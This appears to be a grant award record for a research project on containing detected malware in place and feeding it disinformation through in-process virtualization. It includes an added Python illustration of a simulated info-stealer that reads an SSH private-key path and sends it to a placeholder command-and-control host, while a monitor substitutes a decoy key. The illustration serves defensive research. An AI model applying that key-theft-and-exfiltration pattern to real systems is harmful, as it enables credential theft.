In-Situ Malware Containment and Deception through Dynamic In-Process Virtualization

Abstract

The malware landscape has evolved from the domain of attention-seeking miscreants into a diverse spectrum ranging from best-effort mass-market malware to highly sophisticated state-sponsored attacks using implants, remote access Trojans, and advanced evasion techniques. While existing research mainly focuses on detection, classification, and prevention of various malware threats, this project turns the table on adversaries by using malware infections as a way to feed disinformation to miscreants. Specifically, information-stealing malware opens new deceptive strategies for defenders once a malware infection is detected. That is, if the defender can trick malware into reporting incorrect information to its author, the defender can launch a disinformation campaign, potentially costing the attacker more resources than a simple removal of a detected malware threat would inflict.

To this end, this project proposes to achieve this disinformation capability through a technique we call dynamic in-process virtualization (DIPV). This novel foundational technique is capable of isolating, instrumenting, and deceiving sophisticated malware directly on compromised systems without modifying the execution environment. DIPV assumes that a malware infection has been detected via existing means. However, instead of removing the malware or re-installing the system, DIPV seamlessly creates a dynamic virtualization environment around the identified malware sample. This environment constitutes a reference monitor that enforces complete mediation on all memory accesses and API and system call invocations of the virtualized malware sample.

To achieve the above-stated goals, DIPV incorporates four distinct and synergistic capabilities: virtualizer injection, dynamic instrumentation, dynamic virtualization, and data semantics recovery. The virtualizer injection component transforms a malware sample such that it includes the additional code and data required to perform the in-situ dynamic virtualization. Importantly, DIPV can instrument a malware binary either statically before the malware binary is loaded, or instrument an already executing malware process dynamically at runtime. The dynamic instrumentation is responsible for ensuring that all memory accesses, interaction with the process environment, and control flow decisions are mediated appropriately. This is essential to DIPV's capability to disguise its presence from malware. The dynamic virtualization component ensures that malware that verifies its integrity through, for example, cryptographic checksums will read the correct unmodified data. Furthermore, it will ensure that any dynamically generated (e.g., unpacked) code will be instrumented to guarantee complete mediation. The final component of DIPV is data semantics recovery. As DIPV aims at feeding disinformation to adversaries, the system has to be able to produce such deliberately wrong information at runtime. To this end, DIPV will include human-guided as well as machine-learning-powered mechanisms to provide disinformation that is semantically plausible when received by the adversary.

Finally, throughout the DIPV research effort, we will aggregate representative data sets comprising custom-built canonical benign examples and real-world malware samples that we will use to assess the functionality, performance, and accuracy of our DIPV prototype implementation.

If successful, DIPV will be a novel design point in the fight against malware. The current practice of detecting and, specifically, removing malware infections immediately tips off the adversary that their implant has been detected. With DIPV, the defender has a tool at their disposal that allows them to feed targeted disinformation to the adversary. If DIPV achieves its design goals, this capability allows defenders to inflict significantly higher costs on adversaries than current anti-malware practices can.

Approved for Public Release
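The abstract describes two properties the in-process reference monitor must combine: transparency (a sample that checksums its own image must see the unmodified bytes, or it detects the instrumentation) and deception (reads of sensitive data are answered with plausible decoys, and the resulting egress is allowed but recorded so the defender can verify nothing real left). The following Python model is an added illustration of that mediation policy and is not code from the DIPV project; the in-memory image, hook bytes, file paths, decoy contents and host name are all constructed, and `ReferenceMonitor`, `NaiveMonitor` and `run_sample` are hypothetical names chosen here. `NaiveMonitor` shows the failure mode the dynamic virtualization component is meant to avoid: a monitor that exposes the instrumented image lets the sample's integrity check fail.

```python
import hashlib
from dataclasses import dataclass, field

# All values below are constructed stand-ins, not data from the DIPV project.
ORIGINAL_IMAGE = bytes(range(256)) * 4           # the sample's unmodified 1 KiB code image
HOOK_STUB = b"\xcc" * 16                         # bytes the virtualizer injection adds
HOOK_OFFSET = 0x40
# What is really in memory after virtualizer injection: differs at HOOK_OFFSET.
INSTRUMENTED_IMAGE = (ORIGINAL_IMAGE[:HOOK_OFFSET] + HOOK_STUB
                      + ORIGINAL_IMAGE[HOOK_OFFSET + len(HOOK_STUB):])

REAL_FILES = {"/home/alice/.ssh/id_ed25519": b"REAL-PRIVATE-KEY-MATERIAL"}
DECOY_FILES = {"/home/alice/.ssh/id_ed25519": b"DECOY-KEY-0001-planted-by-defender"}


@dataclass
class ReferenceMonitor:
    """Mediates every memory read, file read and network send of the virtualized sample."""
    image: bytes                  # instrumented bytes actually resident in the process
    original: bytes               # unmodified bytes the sample must be shown
    trace: list = field(default_factory=list)

    def read_memory(self, offset: int, size: int) -> bytes:
        # Transparency: reads over the code image are answered from the original
        # bytes, so a self-checksum succeeds and the instrumentation stays hidden.
        self.trace.append(("mem", offset, size))
        return self.original[offset:offset + size]

    def read_file(self, path: str) -> bytes:
        # Deception: reads of protected paths are satisfied from the decoy store;
        # everything else falls through to the real content.
        self.trace.append(("file", path))
        if path in DECOY_FILES:
            return DECOY_FILES[path]
        return REAL_FILES.get(path, b"")

    def send(self, host: str, payload: bytes) -> bool:
        # Egress is permitted so the disinformation reaches the operator, but every
        # payload is recorded for the defender to audit.
        self.trace.append(("net", host, payload))
        return True


class NaiveMonitor(ReferenceMonitor):
    """Counter-example: exposes the instrumented image, so self-integrity checks fail."""

    def read_memory(self, offset: int, size: int) -> bytes:
        self.trace.append(("mem", offset, size))
        return self.image[offset:offset + size]


def run_sample(mon: ReferenceMonitor) -> dict:
    """Constructed stand-in for a mediated info-stealer: self-check, then read and report."""
    seen = mon.read_memory(0, len(mon.image))
    if hashlib.sha256(seen).digest() != hashlib.sha256(ORIGINAL_IMAGE).digest():
        return {"status": "tamper-detected"}
    loot = mon.read_file("/home/alice/.ssh/id_ed25519")
    mon.send("c2.example.invalid", loot)
    return {"status": "exfiltrated", "sent": loot}


def leaked_real_data(mon: ReferenceMonitor) -> bool:
    """Defender's audit: did any genuine secret leave through the monitor?"""
    return any(ev[0] == "net" and ev[2] in REAL_FILES.values() for ev in mon.trace)


if __name__ == "__main__":
    mon = ReferenceMonitor(image=INSTRUMENTED_IMAGE, original=ORIGINAL_IMAGE)
    print(run_sample(mon), "leaked real data:", leaked_real_data(mon))
    naive = NaiveMonitor(image=INSTRUMENTED_IMAGE, original=ORIGINAL_IMAGE)
    print(run_sample(naive))
```

The real system mediates at the instruction and system-call level rather than through Python method calls, and the decoys come from the data semantics recovery component rather than a static dictionary; the model only makes the policy split visible: original bytes for integrity reads, decoys for sensitive reads, and a full egress trace for the defender.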

Document Details

Document Type
DoD Grant Award
Publication Date
May 23, 2019
Source ID
N000141912364

Entities

People

  • Manuel Egele

Organizations

  • Boston University
  • Office of Naval Research
  • United States Navy

Tags

Fields of Study

  • Computer science

Readers

  • Agent-Based Social Robotics and Mobile-Assisted Learning in Virtual Environments.
  • Cybersecurity.
  • Marine Ecotoxicology

Technology Areas

  • AI & ML
  • Cyber